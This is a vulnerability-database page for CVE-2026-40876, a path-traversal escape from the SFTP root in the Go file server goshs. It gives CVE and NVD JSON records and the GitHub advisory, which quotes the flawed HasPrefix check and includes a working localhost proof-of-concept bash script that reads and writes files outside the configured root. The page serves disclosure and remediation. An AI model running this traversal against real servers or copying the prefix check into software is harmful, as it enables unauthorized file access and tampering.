Vulnerability-Lookup

CVE-2026-40876 (GCVE-0-2026-40876)

Vulnerability from cvelistv5 – Published: 2026-04-21 19:34 – Updated: 2026-04-22 13:29

Title

SFTP root escape via prefix-based path validation in goshs

Summary

goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.6, goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files. The SFTP subsystem routes requests through sftpserver/sftpserver.go into DefaultHandler.GetHandler() in sftpserver/handler.go, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go. helper.go uses a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix. This vulnerability is fixed in 2.0.0-beta.6.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

https://github.com/patrickhener/goshs/security/ad…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	patrickhener	goshs	Affected: < 2.0.0-beta.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40876",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-22T13:29:05.910872Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-22T13:29:26.188Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "goshs",
          "vendor": "patrickhener",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.0.0-beta.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.6, goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files. The SFTP subsystem routes requests through sftpserver/sftpserver.go into DefaultHandler.GetHandler() in sftpserver/handler.go, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go. helper.go uses a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix. This vulnerability is fixed in 2.0.0-beta.6."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T19:34:19.875Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
        }
      ],
      "source": {
        "advisory": "GHSA-5h6h-7rc9-3824",
        "discovery": "UNKNOWN"
      },
      "title": "SFTP root escape via prefix-based path validation in goshs"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40876",
    "datePublished": "2026-04-21T19:34:19.875Z",
    "dateReserved": "2026-04-15T15:57:41.718Z",
    "dateUpdated": "2026-04-22T13:29:26.188Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40876",
      "date": "2026-04-27",
      "epss": "0.00051",
      "percentile": "0.1596"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40876\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T20:17:01.263\",\"lastModified\":\"2026-04-24T20:38:12.403\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.6, goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files. The SFTP subsystem routes requests through sftpserver/sftpserver.go into DefaultHandler.GetHandler() in sftpserver/handler.go, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go. helper.go uses a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix. This vulnerability is fixed in 2.0.0-beta.6.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:*\",\"versionEndExcluding\":\"2.0.0\",\"matchCriteriaId\":\"471EA45E-3052-469D-B301-4D92FB187228\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:*\",\"matchCriteriaId\":\"047ECFC3-056F-4FAC-9B64-5F7C120CFFE1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:2.0.0:beta2:*:*:*:go:*:*\",\"matchCriteriaId\":\"6EA86AD2-EE6D-4427-9434-A9A49A4D38F9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:2.0.0:beta3:*:*:*:go:*:*\",\"matchCriteriaId\":\"F44CF6A3-C1BC-4636-A1D5-1ED69A340FE3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:2.0.0:beta4:*:*:*:go:*:*\",\"matchCriteriaId\":\"486D1F77-023B-4EB9-8B49-17EF6546F2DF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:goshs:goshs:2.0.0:beta5:*:*:*:go:*:*\",\"matchCriteriaId\":\"5834E73F-2EF9-42BD-BE8B-DE087A19A132\"}]}]}],\"references\":[{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"SFTP root escape via prefix-based path validation in goshs\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-22\", \"lang\": \"en\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV4_0\": {\"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"baseScore\": 8.7, \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"version\": \"4.0\"}}], \"references\": [{\"name\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824\"}], \"affected\": [{\"vendor\": \"patrickhener\", \"product\": \"goshs\", \"versions\": [{\"version\": \"\u003c 2.0.0-beta.6\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T19:34:19.875Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.6, goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files. The SFTP subsystem routes requests through sftpserver/sftpserver.go into DefaultHandler.GetHandler() in sftpserver/handler.go, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go. helper.go uses a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix. This vulnerability is fixed in 2.0.0-beta.6.\"}], \"source\": {\"advisory\": \"GHSA-5h6h-7rc9-3824\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40876\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T13:29:05.910872Z\"}}}], \"references\": [{\"url\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T13:29:21.661Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40876\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-04-15T15:57:41.718Z\", \"datePublished\": \"2026-04-21T19:34:19.875Z\", \"dateUpdated\": \"2026-04-22T13:29:26.188Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40876

Vulnerability from fkie_nvd - Published: 2026-04-21 20:17 - Updated: 2026-04-24 20:38

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
goshs	goshs	*
goshs	goshs	2.0.0
goshs	goshs	2.0.0
goshs	goshs	2.0.0
goshs	goshs	2.0.0
goshs	goshs	2.0.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:*",
              "matchCriteriaId": "471EA45E-3052-469D-B301-4D92FB187228",
              "versionEndExcluding": "2.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:*",
              "matchCriteriaId": "047ECFC3-056F-4FAC-9B64-5F7C120CFFE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta2:*:*:*:go:*:*",
              "matchCriteriaId": "6EA86AD2-EE6D-4427-9434-A9A49A4D38F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta3:*:*:*:go:*:*",
              "matchCriteriaId": "F44CF6A3-C1BC-4636-A1D5-1ED69A340FE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta4:*:*:*:go:*:*",
              "matchCriteriaId": "486D1F77-023B-4EB9-8B49-17EF6546F2DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta5:*:*:*:go:*:*",
              "matchCriteriaId": "5834E73F-2EF9-42BD-BE8B-DE087A19A132",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.6, goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files. The SFTP subsystem routes requests through sftpserver/sftpserver.go into DefaultHandler.GetHandler() in sftpserver/handler.go, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go. helper.go uses a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix. This vulnerability is fixed in 2.0.0-beta.6."
    }
  ],
  "id": "CVE-2026-40876",
  "lastModified": "2026-04-24T20:38:12.403",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-21T20:17:01.263",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-5H6H-7RC9-3824

Vulnerability from github – Published: 2026-04-14 22:28 – Updated: 2026-04-15 21:14

Summary

SFTP root escape via prefix-based path validation in goshs

Details

Summary

goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files.

Details

The SFTP subsystem routes requests through sftpserver/sftpserver.go:99-126 into DefaultHandler.GetHandler() in sftpserver/handler.go:90-112, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go:47-59. The vulnerable logic is:

cleanPath = filepath.Clean("/" + clientPath)
if !strings.HasPrefix(cleanPath, sftpRoot) {
    return "", errors.New("access denied: outside of webroot")
}

This is a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix.

That unsafe value then reaches filesystem sinks including:

os.Open in sftpserver/helper.go:80-94
os.Create in sftpserver/helper.go:139-152
os.Rename in sftpserver/helper.go:214-221
os.RemoveAll in sftpserver/helper.go:231-232
os.Mkdir in sftpserver/helper.go:242-243

This means an authenticated SFTP user can escape the configured jail and read, create, upload, rename, or delete content outside the intended root directory.

PoC

The configured SFTP root was /tmp/goshsroot, but the SFTP client was still able to access /tmp/goshsroot_evil/secret.txt and create /tmp/goshsroot_owned/pwned.txt, both of which are outside the configured root.

Manual verification commands used:

Terminal 1

cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'
go build -o /tmp/goshs_beta4 ./

rm -rf /tmp/goshsroot /tmp/goshsroot_evil /tmp/goshsroot_owned /tmp/outside_sftp.txt /tmp/local_upload.txt /tmp/goshs_beta4_client_key
mkdir -p /tmp/goshsroot /tmp/goshsroot_evil
printf 'outside secret\n' > /tmp/goshsroot_evil/secret.txt
printf 'proof via sftp write\n' > /tmp/local_upload.txt
cp sftpserver/goshs_client_key /tmp/goshs_beta4_client_key
chmod 600 /tmp/goshs_beta4_client_key

/tmp/goshs_beta4 -sftp -d /tmp/goshsroot --sftp-port 2222 \
  --sftp-keyfile sftpserver/authorized_keys \
  --sftp-host-keyfile sftpserver/goshs_host_key_rsa

Terminal 2

printf 'ls /tmp/goshsroot_evil\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\nmkdir /tmp/goshsroot_owned\nbye\n' | \
sftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1

printf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\nbye\n' | \
sftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1

cat /tmp/outside_sftp.txt
cat /tmp/goshsroot_owned/pwned.txt

Expected result:

ls /tmp/goshsroot_evil succeeds even though that path is outside /tmp/goshsroot
cat /tmp/outside_sftp.txt prints outside secret
cat /tmp/goshsroot_owned/pwned.txt prints proof via sftp write

PoC Video 1:

https://github.com/user-attachments/assets/d2c96301-afc8-4ddc-b008-74b235f94e31

Single-script verification:

'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc1'

gosh_poc1 script content:

#!/usr/bin/env bash
set -euo pipefail

REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'
BIN='/tmp/goshs_beta4_sftp_escape'
ROOT='/tmp/goshsroot'
OUTSIDE='/tmp/goshsroot_evil'
OWNED='/tmp/goshsroot_owned'
CLIENT_KEY='/tmp/goshs_beta4_client_key'
DOWNLOAD='/tmp/outside_sftp.txt'
UPLOAD_SRC='/tmp/local_upload.txt'
PORT='2222'
SERVER_PID=""

cleanup() {
  if [[ -n "${SERVER_PID:-}" ]]; then
    kill "${SERVER_PID}" >/dev/null 2>&1 || true
    wait "${SERVER_PID}" 2>/dev/null || true
  fi
}
trap cleanup EXIT

echo '[1/6] Building goshs beta.4'
cd "${REPO}"
go build -o "${BIN}" ./

echo '[2/6] Preparing root and sibling paths'
rm -rf "${ROOT}" "${OUTSIDE}" "${OWNED}" "${DOWNLOAD}" "${UPLOAD_SRC}" "${CLIENT_KEY}"
mkdir -p "${ROOT}" "${OUTSIDE}"
printf 'outside secret\n' > "${OUTSIDE}/secret.txt"
printf 'proof via sftp write\n' > "${UPLOAD_SRC}"
cp "${REPO}/sftpserver/goshs_client_key" "${CLIENT_KEY}"
chmod 600 "${CLIENT_KEY}"

echo '[3/6] Starting SFTP server'
"${BIN}" -sftp -d "${ROOT}" --sftp-port "${PORT}" \
  --sftp-keyfile "${REPO}/sftpserver/authorized_keys" \
  --sftp-host-keyfile "${REPO}/sftpserver/goshs_host_key_rsa" \
  >/tmp/gosh_poc1.log 2>&1 &
SERVER_PID=$!

for _ in $(seq 1 20); do
  if python3 - <<PY
import socket
s = socket.socket()
try:
    s.connect(("127.0.0.1", ${PORT}))
    raise SystemExit(0)
except OSError:
    raise SystemExit(1)
finally:
    s.close()
PY
  then
    break
  fi
  sleep 1
done

echo '[4/6] Listing and downloading path outside configured root'
printf 'ls /tmp/goshsroot_evil\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\nmkdir /tmp/goshsroot_owned\nbye\n' | \
  sftp -i "${CLIENT_KEY}" -P "${PORT}" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1

echo '[5/6] Writing a new file outside configured root'
printf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\nbye\n' | \
  sftp -i "${CLIENT_KEY}" -P "${PORT}" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1

echo '[6/6] Verifying outside-root read and write'
echo "Downloaded content: $(cat "${DOWNLOAD}")"
echo "Written content: $(cat "${OWNED}/pwned.txt")"

if [[ "$(cat "${DOWNLOAD}")" == 'outside secret' ]] && [[ "$(cat "${OWNED}/pwned.txt")" == 'proof via sftp write' ]]; then
  echo '[RESULT] VULNERABLE: authenticated SFTP user escaped the configured root'
else
  echo '[RESULT] NOT REPRODUCED'
  exit 1
fi

PoC Video 2:

https://github.com/user-attachments/assets/25e7a4d7-6ec7-40a6-b3d4-d66df3ea3e5f

Impact

This is a path traversal / jail escape in the SFTP service. Any authenticated SFTP user can break out of the configured root and access sibling filesystem paths that were never meant to be exposed through goshs. In practice this can lead to unauthorized file disclosure, arbitrary file upload outside the shared root, unwanted directory creation, overwrite of sensitive files, or data deletion depending on the reachable path and server permissions.

Remediation

Suggested fixes:

Replace the raw prefix check with a real directory-boundary validation such as requiring either exact root equality or root + path separator as the prefix.
Reuse the hardened HTTP-style path sanitizer across SFTP as well, so all file-serving modes share the same boundary logic.
Add regression tests for sibling-prefix cases like /tmp/goshsroot_evil, not only .. traversal payloads.

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40876"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:28:17Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
